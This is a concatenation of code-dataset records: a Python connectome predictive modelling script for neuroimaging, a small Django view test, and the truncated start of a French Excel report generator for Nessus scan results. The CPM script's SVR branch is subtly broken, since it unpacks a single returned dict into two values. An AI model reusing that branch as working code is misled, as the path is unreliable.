.train_test_split(flat_fc_array, behav_array, test_size=0.15, random_state=667)\n\n return mat_train, mat_test, behav_train, behav_test\n\ndef _cpm_edges_cube_reshape(mat, nb_nodes_rows, nb_nodes_cols):\n \"\"\" Short function reshaping the train and test matrices to cubes. 
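With\n    order='F' the first axis varies fastest, matching MATLAB column-major\n    layout; a tiny illustration:\n\n        >>> import numpy as np\n        >>> np.arange(4).reshape(2, 2, order='F')\n        array([[0, 2],\n               [1, 3]])\n\n    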
Currently necessary to match\n the original matlab code, but can probably change later\n \"\"\"\n\n #We use a Fortran order because we shifted the orientation of the dataset\n # with a transpose earlier\n\n cube_mat = mat.reshape(nb_nodes_rows, nb_nodes_cols, mat.shape[0], order=\"F\")\n\n return cube_mat\n\ndef _cpm_prep_empty(nb_nodes_rows, nb_nodes_cols, mat_train, mat_test):\n \"\"\" From sizes computed, returns empty arrays we will use to store information.\n \"\"\"\n\n behav_pred_train = {}\n behav_pred_train[\"norm_pos\"] = np.zeros((mat_train.shape[0], 1))\n behav_pred_train[\"norm_neg\"] = np.zeros((mat_train.shape[0], 1))\n\n behav_pred_test = {}\n behav_pred_test[\"norm_pos\"] = np.zeros((mat_test.shape[0], 1))\n behav_pred_test[\"norm_neg\"] = np.zeros((mat_test.shape[0], 1))\n\n edges_cv_cube = {}\n edges_cv_cube['norm_pos'] = np.zeros((nb_nodes_rows, nb_nodes_cols, mat_train.shape[0]))\n edges_cv_cube['norm_neg'] = np.zeros((nb_nodes_rows, nb_nodes_cols, mat_train.shape[0]))\n\n rmse_train_final = {}\n rmse_train_final['norm_pos'] = pd.DataFrame(columns=['c_value',\n 'g_value', 'ep_value', 'rmse_pos', 'rmse_neg'])\n rmse_train_final['norm_neg'] = pd.DataFrame(columns=['c_value',\n 'g_value', 'ep_value', 'rmse_pos', 'rmse_neg'])\n\n return behav_pred_train, behav_pred_test, edges_cv_cube, rmse_train_final\n\ndef _cpm_loocv_sample(mat_train, behav_train, leftout):\n \"\"\" Function iteratively leaving out one participant and returning the sample to \n use for LOOCV\n \"\"\"\n\n mat_train_loocv = np.delete(mat_train, leftout, axis=0)\n behav_train_loocv = np.delete(behav_train, leftout, axis=0)\n\n return mat_train_loocv, behav_train_loocv\n\ndef _cpm_feature_selection(mat_train_loocv, behav_train_loocv, nb_nodes_rows, nb_nodes_cols):\n \"\"\" Core of the CPM. 
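The per-edge statistic is a plain Pearson correlation\n    between edge strength and the behavioural score across the training\n    subjects, e.g. with hypothetical values for four subjects:\n\n        >>> from scipy.stats import pearsonr\n        >>> pearsonr([0.1, 0.4, 0.3, 0.9], [10, 20, 15, 40])[0]  # r ~ 0.996\n\n    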
Each edge is assessed for it's correlation with the fingerprinting.\n \"\"\"\n\n r_val_arr = np.array([])\n p_val_arr = np.array([])\n\n s_behav_train_loocv = np.squeeze(behav_train_loocv)\n\n ########### Python-style correlation\n for col in range(mat_train_loocv.shape[1]):\n if (((col + 1) == 1) or ((col + 1) == mat_train_loocv.shape[1])):\n print(f' ...Starting correlations {col + 1}/{mat_train_loocv.shape[1]}')\n\n edge_values = np.squeeze(mat_train_loocv[:,col])\n\n with warnings.catch_warnings():\n warnings.filterwarnings('error') #If warning, consider as error\n try:\n r_val, p_val = scipy.stats.pearsonr(x=edge_values, y=s_behav_train_loocv)\n except Warning: #If warning, set correlation to null\n r_val = 0\n p_val = 1\n\n r_val_arr = np.append(r_val_arr, r_val)\n p_val_arr = np.append(p_val_arr, p_val)\n\n r_val_mat = np.reshape(r_val_arr, (nb_nodes_rows, nb_nodes_cols))\n p_val_mat = np.reshape(p_val_arr, (nb_nodes_rows, nb_nodes_cols))\n\n return r_val_mat, p_val_mat\n\ndef _cpm_significant_edges(r_val_mat, p_val_mat, thresh_corr):\n \"\"\" Based on the correlation and p-value, we determine which edge is significant.\n \"\"\"\n\n pos_mask = np.where(((r_val_mat > 0) & (p_val_mat < thresh_corr)), 1, 0)\n neg_mask = np.where(((r_val_mat < 0) & (p_val_mat < thresh_corr)), 1, 0)\n\n return pos_mask, neg_mask\n\ndef _cpm_sums(cube_mat, pos_mask, neg_mask, rand_pos_mask=None, rand_neg_mask=None):\n \"\"\" Function computing training sums from a cube.\n \"\"\"\n\n sum_edges = {}\n sum_edges['norm_pos'] = np.zeros((cube_mat.shape[2], 1))\n sum_edges['norm_neg'] = np.zeros((cube_mat.shape[2], 1))\n\n try:\n if rand_pos_mask.any():\n sum_edges['rand_pos'] = np.zeros((cube_mat.shape[2], 1))\n sum_edges['rand_neg'] = np.zeros((cube_mat.shape[2], 1))\n except AttributeError:\n pass\n\n for sub in range(0, sum_edges['norm_pos'].shape[0]):\n sum_edges['norm_pos'][sub] = sum(sum(cube_mat[:,:,sub] * pos_mask)) / 2\n sum_edges['norm_neg'][sub] = sum(sum(cube_mat[:,:,sub] * neg_mask)) / 2\n #Check if array for random is empty.\n #Will throw error if yes, so we simply pass if we get error.\n try:\n if rand_pos_mask.any(): #Check if the array is empty\n sum_edges['rand_pos'][sub] = sum(sum(cube_mat[:,:,sub] * rand_pos_mask)) / 2\n sum_edges['rand_neg'][sub] = sum(sum(cube_mat[:,:,sub] * rand_neg_mask)) / 2\n except AttributeError:\n pass\n\n return sum_edges\n\ndef _cpm_test_loocv_sums(cube_mat, pos_mask, neg_mask, leftout):\n \"\"\" Function to compute the test sum during the loocv\n \"\"\"\n\n test_mat = cube_mat[:,:,leftout]\n\n test_sum = {}\n test_sum[\"norm_pos\"] = np.array([sum(sum(test_mat * pos_mask)) / 2])\n test_sum[\"norm_neg\"] = np.array([sum(sum(test_mat * neg_mask)) / 2])\n\n return test_sum\n\ndef _svr_grid_search(train_sum_loocv, test_sum_loocv, behav_train_loocv, behav_test_loocv):\n \"\"\" Function performing a grid search on the SVR parameters. 
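The grid is\n    exhaustive: 6 C values x 10 gammas x 11 epsilons = 660 parameter triples,\n    each fitted for both the positive and the negative edge sums, for every\n    left-out subject, so this is where most of the runtime goes.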
\n    \"\"\"\n    dict_rmse_loocv = {}\n\n    param_data = pd.DataFrame(columns=['c_value', 'g_value',\n        'ep_value', 'rmse_pos', 'rmse_neg'])\n\n    for c_value in [1,10,100,1000,10000,100000]:\n        for g_value in [1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]:\n            for ep_value in [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5, 10]:\n\n                behav_train_loocv_scaled, behav_test_loocv_scaled = _svr_scaler(behav_train_loocv,\n                    behav_test_loocv)\n\n                train_sum_loocv_scaled_pos, test_sum_loocv_scaled_pos = _svr_scaler(\n                    train_sum_loocv['norm_pos'],\n                    test_sum_loocv['norm_pos'])\n\n                train_sum_loocv_scaled_neg, test_sum_loocv_scaled_neg = _svr_scaler(\n                    train_sum_loocv['norm_neg'], test_sum_loocv['norm_neg'])\n\n                rmse_test_pos_loocv = _svr_fit_predict(train_sum_loocv_scaled_pos,\n                    test_sum_loocv_scaled_pos, behav_train_loocv_scaled,\n                    behav_test_loocv_scaled, g_value=g_value, c_value=c_value, ep_value=ep_value, type_pred='loocv')\n\n                rmse_test_neg_loocv = _svr_fit_predict(train_sum_loocv_scaled_neg,\n                    test_sum_loocv_scaled_neg, behav_train_loocv_scaled,\n                    behav_test_loocv_scaled, g_value=g_value, c_value=c_value, ep_value=ep_value, type_pred='loocv')\n\n                params_final = {'c_value':[c_value], 'g_value':[g_value], 'ep_value':[ep_value],\n                    'rmse_pos':[rmse_test_pos_loocv], 'rmse_neg':[rmse_test_neg_loocv]}\n\n                params_final_df = pd.DataFrame.from_dict(params_final, orient=\"columns\")\n\n                param_data = pd.concat([param_data, params_final_df], axis=0, ignore_index=True)\n\n    dict_rmse_loocv['norm_pos'] = param_data.loc[[param_data['rmse_pos'].idxmin()]]\n    dict_rmse_loocv['norm_neg'] = param_data.loc[[param_data['rmse_neg'].idxmin()]]\n\n    return dict_rmse_loocv\n\ndef _svr_scaler(train_sum, test_sum):\n    \"\"\" Takes the input to scale from train and test, scales them,\n    separates them, and returns them.\n    \"\"\"\n\n    sum_scale = np.concatenate((np.squeeze(train_sum), test_sum))\n    sum_scale_res = sum_scale.reshape(-1,1)\n    scaler_sum = preprocessing.StandardScaler()\n    scaled_sum = scaler_sum.fit(sum_scale_res)\\\n        .transform(sum_scale_res)\n\n    if test_sum.size == 1:\n        train_sum_scaled = np.delete(scaled_sum, -1, axis=0)\n        test_sum_scaled = scaled_sum[-1]\n    else:\n        train_sum_scaled = scaled_sum[0:train_sum.size]\n        test_sum_scaled = scaled_sum[train_sum.size:]\n\n    return train_sum_scaled, test_sum_scaled\n\ndef _svr_fit_predict(train_sum_scaled, test_sum_scaled, behav_train, behav_test,\n    g_value, c_value, ep_value, type_pred):\n    \"\"\" Fits and predicts an SVR model\n    \"\"\"\n    svr_obj = SVR(kernel='rbf', gamma=g_value, C=c_value, epsilon=ep_value)\n    svr_obj.fit(train_sum_scaled, behav_train.ravel())\n    if type_pred == \"final\":\n        behav_pred_test = svr_obj.predict(test_sum_scaled)\n    else:\n        behav_pred_test = svr_obj.predict(test_sum_scaled.reshape(1,-1))\n\n    rmse_test = metrics.mean_squared_error(np.squeeze([behav_test]), np.squeeze([behav_pred_test]), squared=False)\n\n    #When doing the prediction, if we do LOOCV we only return the RMSE.\n    # When doing the prediction on the final sample, we return the predicted values as well\n    if type_pred == \"final\":\n        return rmse_test, behav_pred_test\n    return rmse_test\n\ndef _svr_best_param_selection(rmse_train_final, type_m):\n    \"\"\" Simple function grabbing the best parameters from the SVR grid search (lowest RMSE)\n    \"\"\"\n    #The lookup is identical for both edge signs; type_m ('pos' or 'neg') selects the RMSE column\n    min_rmse = rmse_train_final.loc[[rmse_train_final[f'rmse_{type_m}'].idxmin()]]\n\n    c_value = min_rmse.loc[:,\"c_value\"].iloc[0]\n    g_value = 
min_rmse.loc[:,\"g_value\"].iloc[0]\n ep_value = min_rmse.loc[:,\"ep_value\"].iloc[0]\n\n return c_value, g_value, ep_value\n\ndef _lm_fit_predict(train_sum, test_sum, behav_train, behav_test=None):\n \"\"\" Simple function fitting a predicting a linear model.\n When doing the final test prediction, we also want the RMSE.\n \"\"\"\n\n fit_lm = lm().fit(train_sum, behav_train)\n\n try:\n if behav_test.any():\n behav_pred_test = fit_lm.predict(test_sum)\n rmse_test = metrics.mean_squared_error(np.squeeze([behav_test]), np.squeeze([behav_pred_test]), squared=False)\n\n return rmse_test, behav_pred_test\n except AttributeError:\n behav_pred_test = fit_lm.predict(test_sum.reshape(1,-1))\n return behav_pred_test\n\ndef _cpm_cross_validated_edges(edges_cv_cube, thresh_retain):\n \"\"\" Computes the final mask to use in the final train/test set\n \"\"\"\n final_sum_edges = {}\n final_mask_edges = {}\n\n #Here, edges_cv_cube is a dictionary containing cubes of arrays, \n # 1 for positive and 1 for negative edges\n for key, arrays in edges_cv_cube.items(): #For positive and negative edges...\n final_edges_cv = np.sum(arrays, axis=2)\n mask = np.where(final_edges_cv >= (thresh_retain*arrays.shape[2]), 1, 0)\n\n final_sum_edges[key] = final_edges_cv\n final_mask_edges[key] = mask\n\n return final_sum_edges, final_mask_edges\n\ndef _cpm_random_mask(pos_neg_masks):\n \"\"\" Here, we want to create two random masks of random edges for prediction.\n We create 2 because the number of edges might differ between the positive\n and negative edges. We want a random mask that has the same number of edges as the mask\n they are trying to mimic.\n\n Easiest way is to simply shuffle the original array\n \"\"\"\n\n random_masks = {}\n\n for type_edges, mask in pos_neg_masks.items():\n flat_mask = mask.flatten() #Make the mask flat, because shuffle only works on 1 dimension\n np.random.seed(667) \n np.random.shuffle(flat_mask) #Shuffle position of 0 and 1s (in-place)\n rand_mask = flat_mask.reshape(mask.shape) #Reshape the shuffled array to the original shape\n\n random_masks[type_edges] = rand_mask \n\n return random_masks\n\ndef _cpm_export_edges(pos_neg_sums, args):\n \"\"\" Quick function exporting the matrices for the sum of participants\n using a given edge for predicted behavior.\n \"\"\"\n for keys, arrays in pos_neg_sums.items():\n np.savetxt(f'{args.output}/sum_{keys}_edges_cv_{args.name}.csv', arrays, delimiter=',', \n fmt='%f')\n\ndef cpmpy(behav_data, matrix_3d, args):\n \"\"\" Main CPM function. Under the hood it wraps multiple\n smaller functions that execute the different steps.\n \"\"\"\n #First, we prepare the CPM\n ## Get information on sizes of matrices\n print(\" Preparing CPM input...\")\n nb_nodes_rows, nb_nodes_cols = _cpm_prep_sizes(matrix_3d=matrix_3d)\n\n ## Train-Test split of the data\n mat_train, mat_test, behav_train, behav_test = _cpm_train_test_split(behav_data=behav_data,\n matrix_3d=matrix_3d)\n\n ## Creating of empty arrays to store stuff during computation\n behav_pred_train, behav_pred_test, edges_cv_cube, rmse_train_final = _cpm_prep_empty(\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols,\n mat_train=mat_train, mat_test=mat_test)\n\n #Final step: for some operations, need a cube of the matrices. 
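The flat\n    # (n_subjects, n_edges) matrix goes back to an\n    # (n_nodes_rows, n_nodes_cols, n_subjects) cube -- e.g. 40 subjects on a\n    # 100-node parcellation give a (100, 100, 40) cube (sizes illustrative).\n    # 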
Reshape it here.\n cube_mat_train = _cpm_edges_cube_reshape(mat=mat_train,\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols)\n\n cube_mat_test = _cpm_edges_cube_reshape(mat=mat_test,\n nb_nodes_rows=nb_nodes_rows, nb_nodes_cols=nb_nodes_cols)\n\n # Now, we can launch the CPM\n print(\" Launching cross-validation...\")\n for leftout in range(0, mat_train.shape[0]):\n #if ((leftout + 1) == 1) or ((leftout + 1) % 20 == 0):\n print(f' Leaving out participant {leftout + 1}/{mat_train.shape[0]}')\n\n mat_train_loocv, behav_train_loocv = _cpm_loocv_sample(mat_train=mat_train,\n behav_train=behav_train, leftout=leftout)\n\n r_val_mat, p_val_mat = _cpm_feature_selection(mat_train_loocv=mat_train_loocv,\n behav_train_loocv=behav_train_loocv, nb_nodes_rows=nb_nodes_rows,\n nb_nodes_cols=nb_nodes_cols)\n\n pos_mask, neg_mask =_cpm_significant_edges(r_val_mat=r_val_mat, p_val_mat=p_val_mat,\n thresh_corr=args.thresh_corr)\n\n edges_cv_cube[\"norm_pos\"][:,:,leftout] = pos_mask\n edges_cv_cube[\"norm_neg\"][:,:,leftout] = neg_mask\n\n #Might be a more elegant way of doing this, but I'm doing it this way\n #We basically need the matrices in a cube for easing some operations.\n\n cube_mat_loocv = np.delete(cube_mat_train, leftout, axis=2)\n\n train_sums_loocv = _cpm_sums(cube_mat_loocv, pos_mask=pos_mask, neg_mask=neg_mask)\n test_sums_loocv = _cpm_test_loocv_sums(cube_mat=cube_mat_train, pos_mask=pos_mask,\n neg_mask=neg_mask, leftout=leftout)\n\n behav_train_loocv = behav_train_loocv.copy()\n behav_test_loocv = np.array([behav_train[leftout]])\n\n if args.model == \"LM\":\n behav_pred_train['norm_pos'][leftout] = _lm_fit_predict(train_sums_loocv['norm_pos'],\n test_sums_loocv['norm_pos'], behav_train=behav_train_loocv)\n behav_pred_train['norm_neg'][leftout] = _lm_fit_predict(train_sums_loocv['norm_neg'],\n test_sums_loocv['norm_neg'], behav_train=behav_train_loocv)\n\n elif args.model == \"SVR\":\n svr_params, behav_pred_test[leftout] = _svr_grid_search(train_sums_loocv, test_sums_loocv, behav_train_loocv,\n behav_test_loocv)\n\n rmse_train_final['norm_pos'] = pd.concat([rmse_train_final['norm_pos'],\n svr_params['norm_pos']])\n rmse_train_final['norm_neg'] = pd.concat([rmse_train_final['norm_neg'],\n svr_params['norm_neg']])\n\n print(\" Final validation in test set\")\n #Final train/test measures for the final models\n final_sum_edges, final_mask_edges = _cpm_cross_validated_edges(\n edges_cv_cube=edges_cv_cube, thresh_retain=args.thresh_retain)\n\n #We write the final_sum_edges to file as we won't be needing it later and it's for future computations\n print(f' ... 
Exporting cross-validated edges to file...')\n    _cpm_export_edges(final_sum_edges, args=args)\n\n    #Create a random mask that will be used to generate random sums for prediction.\n    rando_mask = _cpm_random_mask(pos_neg_masks=final_mask_edges)\n\n    #Compute all training/test sums\n    train_sum_final = _cpm_sums(cube_mat=cube_mat_train, pos_mask=final_mask_edges['norm_pos'],\n        neg_mask=final_mask_edges['norm_neg'], \n        rand_pos_mask=rando_mask['norm_pos'], rand_neg_mask=rando_mask['norm_neg'])\n\n    test_sum_final = _cpm_sums(cube_mat=cube_mat_test, pos_mask=final_mask_edges['norm_pos'],\n        neg_mask=final_mask_edges['norm_neg'], \n        rand_pos_mask=rando_mask['norm_pos'], rand_neg_mask=rando_mask['norm_neg'])\n\n    #Final phase: Prediction metrics in final sample.\n    if args.model == \"SVR\":\n        dict_rmse = {} #For final RMSE\n        dict_behav_pred = {} #For final prediction\n\n        train_sum_final_scaled = {} #To store the scaled variables prior to prediction\n        test_sum_final_scaled = {}\n        behav_scaled = {}\n\n        c_value_final = {} #Storing the hyper parameters for each type of run\n        g_value_final = {}\n        ep_value_final = {}\n\n        #Looping over needed parameters, we scale the sums to use for SVR and we select the right\n        # svr parameters.\n        for type_e in ['pos', 'neg']:\n            for type_s in ['norm', 'rand']:\n                train_sum_final_scaled[f'{type_s}_{type_e}'], \\\n                test_sum_final_scaled[f'{type_s}_{type_e}'] = _svr_scaler(\n                    train_sum_final[f'{type_s}_{type_e}'], test_sum_final[f'{type_s}_{type_e}'])\n\n                if type_s == \"norm\":\n                    c_value_final[f'{type_s}_{type_e}'], g_value_final[f\"{type_s}_{type_e}\"], \\\n                    ep_value_final[f'{type_s}_{type_e}'] = _svr_best_param_selection(\n                        rmse_train_final=rmse_train_final[f'{type_s}_{type_e}'], type_m=type_e\n                    )\n\n        #Last thing needed to scale is the behavior\n        behav_scaled['train'], behav_scaled['test'] = _svr_scaler(\n            behav_train, behav_test)\n\n        #Next, we fit and predict our behavior using SVR\n        for type_p in ['train', 'test']: #Type of prediction to do\n            for type_e in ['pos', 'neg']: #Type of edge association (positive/negative)\n                for type_s in ['norm', 'rand']: #Type of sum (normal or randomized?)\n                    if type_p == \"test\":\n                        test_sum_tmp = test_sum_final\n                    elif type_p == \"train\":\n                        test_sum_tmp = train_sum_final\n\n                    #NB: test_sum_tmp is currently unused in this branch; the scaled sums below are always used\n                    dict_rmse[f'rmse_{type_s}_{type_p}_{type_e}'], \\\n                    dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}'] = _svr_fit_predict(\n                        train_sum_scaled=train_sum_final_scaled[f'{type_s}_{type_e}'],\n                        test_sum_scaled=test_sum_final_scaled[f'{type_s}_{type_e}'],\n                        behav_train=behav_scaled['train'], behav_test=behav_scaled[f'{type_p}'],\n                        c_value=c_value_final[f'{type_s}_{type_e}'], \n                        g_value=g_value_final[f\"{type_s}_{type_e}\"],\n                        ep_value=ep_value_final[f'{type_s}_{type_e}'], type_pred='final')\n\n    if args.model == \"LM\":\n        dict_rmse = {}\n        dict_behav_pred = {}\n\n        #We iterate over the different metrics we need to extract, and store them in dictionaries\n        for type_p in ['test', 'train']:\n            for type_e in ['pos', 'neg']:\n                for type_s in ['rand', 'norm']:\n                    #To avoid having multiple calls to _lm_fit_predict, we use aliases for the\n                    # variables to pass. 
Specifically, we want the prediction in both train and\n # test set, so we just assign them to different aliases before running pred.\n if type_p == \"test\":\n test_sum_tmp = test_sum_final\n behav_test_tmp = behav_test\n elif type_p == \"train\":\n test_sum_tmp = train_sum_final\n behav_test_tmp = behav_train\n\n dict_rmse[f'rmse_{type_s}_{type_p}_{type_e}'], dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}'] = _lm_fit_predict(\n train_sum=train_sum_final[f'{type_s}_{type_e}'],\n test_sum=test_sum_tmp[f'{type_s}_{type_e}'],\n behav_train=behav_train, behav_test=behav_test_tmp)\n\n #The CPM outputs many things:\n # 1) The actual behavior observed for the training and testing sample\n # 2) The predicted values during the cross-validation\n # 3) The actual behavior observed in the leftout test set\n # 4) The RMSE of the prediction in the leftout test set\n # 5) The arrays of predicted behavior for participants in the leftout test set\n\n return behav_train, behav_pred_train, behav_test, dict_rmse, dict_behav_pred\n\ndef cpm_prediction_measures(behav_train, behav_pred_train, behav_test, dict_behav_pred, args):\n \"\"\" Here, the idea is to compute the different prediction metrics we are interested in,\n and store that information for output.\n\n Metrics we output are:\n - For pos/neg edges\n - Cross-validation:\n - Correlation between original behavior and predicted behavior during LOOCV\n - RMSE between original behavior and predicted behavior during LOOCV\n - Leftout test set:\n - For normal and randomized FC sums\n - Correlation between test set behavior and predicted behavior (final)\n - RMSE between test set behavior and predicted behavior\n\n In total, we should have 12 different metrics\n \"\"\"\n predict_meas_valid = pd.DataFrame(columns=['model', 'type_edge', 'type_sum', 'type_samp', \n 'type_predict', 'type_meas', 'value'])\n\n #First, compute for the cross-validation\n for type_e in ['pos', 'neg']:\n for type_s in ['norm', 'rand']:\n if type_s == 'norm':\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_train),\n np.squeeze(behav_pred_train[f'{type_s}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_train),\n y_pred=np.squeeze(behav_pred_train[f'{type_s}_{type_e}']),\n squared=False)\n\n tmp_df = pd.DataFrame(data={'model':[args.model, args.model, args.model], \n 'type_edge':[type_e, type_e, type_e],\n 'type_sum':[type_s, type_s, type_s], \n 'type_samp':['cross_validation', 'cross_validation', 'cross_validation'],\n 'type_predict':['norm', 'norm', 'norm'],\n 'type_meas':['corr', 'pval', 'rmse'], \n 'value':[corr_val, p_val, rmse_val]})\n\n predict_meas_valid = pd.concat([predict_meas_valid, tmp_df], axis=0, \n ignore_index=True)\n\n #Next, compute for the test set\n for type_e in ['pos', 'neg']:\n for type_s in ['norm', 'rand']:\n for type_p in ['train', 'test']:\n if type_p == 'train':\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_train),\n np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_train),\n y_pred=np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']),\n squared=False)\n elif type_p == \"test\":\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_test),\n np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_test),\n y_pred=np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']),\n squared=False)\n\n tmp_df = 
pd.DataFrame(data={\n 'model':[args.model, args.model, args.model],\n 'type_edge':[type_e, type_e, type_e],\n 'type_sum':[type_s, type_s, type_s],\n 'type_samp':['final', 'final', 'final'], \n 'type_predict':[type_p, type_p, type_p],\n 'type_meas':['corr', 'pval', 'rmse'],\n 'value':[corr_val, p_val, rmse_val]})\n\n predict_meas_valid = pd.concat([predict_meas_valid, tmp_df], axis=0, \n ignore_index=True)\n\n return predict_meas_valid\n\ndef cpm_export(predict_meas_valid, args):\n \"\"\" Simple function exporting the predicted measures\n \"\"\"\n predict_meas_valid.to_csv(f\"{args.output}/model_validation_{args.model}_{args.name}.csv\")\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"St_Onge_2022_Fingerprinting/connectome_predictive_modelling/python/cpm_python_v2.py","file_name":"cpm_python_v2.py","file_ext":"py","file_size_in_byte":32198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278341391","text":"from django.urls import reverse\nimport pytest\n\n\n@pytest.mark.django_db\nclass TestViewsCase:\n\n def test_index_200(self, client):\n url = reverse('catalog:index')\n response = client.get(url)\n assert response.status_code == 200\n\n def test_authors(self, client):\n url = reverse('catalog:author')\n response = client.get(url)\n assert response.charset == 'utf-8'\n assert response.client == client\n assert 'catalog/author_index.html' in (t.name for t in response.templates)\n\n def test_add_book_post(self, client):\n url = reverse('catalog:addbook_url')\n response = client.post(url, {'title': 'Python CookBook', 'description': 'Lorem, ipsum dolor \\\n sit amet consectetur adipisicing elit. Ratione maxime possimus odio, \\\n aliquid in cum corporis vero vitae ullam quia amet molestiae rerum \\\n quos distinctio nemo nostrum. Culpa, fuga. Ipsam? Commodi consectetur\\\n tempora quisquam dolorem laboriosam vero eligendi eius culpa accusantium?\\\n Similique maxime culpa ad eveniet iure natus, porro nemo repudiandae \\\n praesentium sed illum, unde iste explicabo, dolores vel hic? 
Pariatur, \\\n quod exercitationem ipsum illum labore eius velit nobis mol'})\n assert response.status_code == 200\n\n","sub_path":"catalog/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"242213267","text":"# -*- coding: utf-8 -*-\n## @package csvdump\n# Ce module permet la gestion de fichier Excel\n\nimport csv\nimport xlwt\nimport sys\nfrom openpyxl import *\nimport openpyxl\nfrom openpyxl.styles import Font, Fill, Alignment, Color, colors\nimport nessusdump\nimport config\nfrom datetime import date\nimport os\n\n\n## Fonction search_start_line\n# @param worksheet Fichier Excel ouvert\n# @return Numero de ligne\n# Fonction permettant de trouver le debut du hacker s view\ndef search_start_line(worksheet):\n\tcurrentline = 1\n\twhile not (worksheet[\"B\"+str(currentline)].value == \"Domaines\" or worksheet[\"B\"+str(currentline)].value == \"Domain(s)\"):\n\t\tcurrentline = currentline+1\n\treturn currentline+1\n\n## Fonction dumpxlsopen\n# @param filepath Path du fichier Excel\n# @param vulnstruct Liste de structure fiche\n# @param hvstruct Liste de structure hacker s view\n# @param listcriticite Liste des criticite selectionne par l utilisateur\n# Permet la creation du fichier Excel final\ndef dumpxlsopen(filepath, vulnstruct, hvstruct, listcriticite):\n\ttemplate = load_workbook(config.readconf(\"Template\", \"template_excel\"))\n\tinterfacecount = {\"admin_infra\": 0, \"admin_web\": 0, \"api_web\": 0, \"bdd\": 0}\n\tif hvstruct != None:\n\t\tdatecount = []\n\t\ttemplate_source_sheet = template[\"Fiche Vulns MASTER\"]\n\t\thackersviewsheet = template[\"Hacker's View\"]\n\t\tline = search_start_line(hackersviewsheet)\n\t\tfor currentHv in hvstruct:\n\t\t\thackersviewsheet[\"A\"+str(line)] = currentHv.categorie\n\t\t\thackersviewsheet[\"B\"+str(line)] = currentHv.domaine\n\t\t\thackersviewsheet[\"C\"+str(line)] = currentHv.ipNew\n\t\t\thackersviewsheet[\"D\"+str(line)] = currentHv.portsNew\n\t\t\thackersviewsheet[\"E\"+str(line)] = currentHv.localisationNew\n\t\t\thackersviewsheet[\"I\"+str(line)] = currentHv.commentaire\n\t\t\tinterfacecount[\"admin_infra\"] = interfacecount[\"admin_infra\"]+currentHv.commentaire.count(\"administration infrastructure\")\n\t\t\tinterfacecount[\"admin_web\"] = interfacecount[\"admin_web\"]+currentHv.commentaire.count(\"administration Web\")\n\t\t\tinterfacecount[\"bdd\"] = interfacecount[\"bdd\"]+currentHv.commentaire.count(\"Base de donn\")\n\t\t\tif currentHv.ipOld == \"unknown\":\n\t\t\t\thackersviewsheet[\"A\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"B\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"C\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"D\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"E\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"I\"+str(line)].font = Font(color=colors.RED)\n\t\t\telse:\n\t\t\t\tif currentHv.ipNew != currentHv.ipOld:\n\t\t\t\t\thackersviewsheet[\"C\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\tif currentHv.portsNew.replace(\" \", \"\") != currentHv.portsOld.replace(\" \", \"\"):\n\t\t\t\t\thackersviewsheet[\"D\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\tif currentHv.localisationNew != unicode(currentHv.localisationOld).encode('utf-8'):\n\t\t\t\t\thackersviewsheet[\"E\"+str(line)].font = Font(color=colors.RED)\n\t\t\tif vulnstruct != 
None:\n\t\t\t\tlisthashtag = nessusdump.gethashtaglist(vulnstruct, currentHv.ipNew, listcriticite)\n\t\t\t\tif len(listhashtag) > 0:\n\t\t\t\t\thackersviewsheet[\"F\"+str(line)] = \"[oui]\"\n\t\t\t\t\thackersviewsheet[\"H\"+str(line)] = \"~\".join(listhashtag)\n\t\t\tline = line+1\n\n\tif vulnstruct != None:\n\t\tfor current in vulnstruct:\n\t\t\tif current.typevuln == \"External\":\n\t\t\t\texcelfiche(filepath, template, vulnstruct, listcriticite, \"External\", interfacecount)\n\t\t\t\tbreak\n\t\ttemplate = load_workbook(config.readconf(\"Template\", \"template_excel\"))\n\t\tfor current in vulnstruct:\n\t\t\tif current.typevuln == \"Internal\":\n\t\t\t\texcelfiche(filepath, template, vulnstruct, listcriticite, \"Internal\", interfacecount = None)\n\t\t\t\tbreak\n\telse:\n\t\tgraph_sheet = template[\"Graph\"]\n\t\tgraph_sheet[\"C17\"] = interfacecount[\"admin_web\"]\n\t\tgraph_sheet[\"C18\"] = interfacecount[\"admin_infra\"]\n\t\tgraph_sheet[\"C19\"] = interfacecount[\"api_web\"]\n\t\tgraph_sheet[\"C20\"] = interfacecount[\"bdd\"]\n\t\ttemplate.save(filepath)\n\tif vulnstruct != None:\n\t\tos.remove(filepath.name)\n\n\n## Fonction excelfiche\n# @param filepath Path du fichier Excel\n# @param template Template du Excel\n# @param vulnstruct Liste de structure fiche\n# @param listcriticite Liste des criticite selectionne par l utilisateur\n# @param typeF Type de la fiche External ou Internal\n# @param interfacecount Compatage des interfaces pour le HV\n# Permet la creation des fiches de 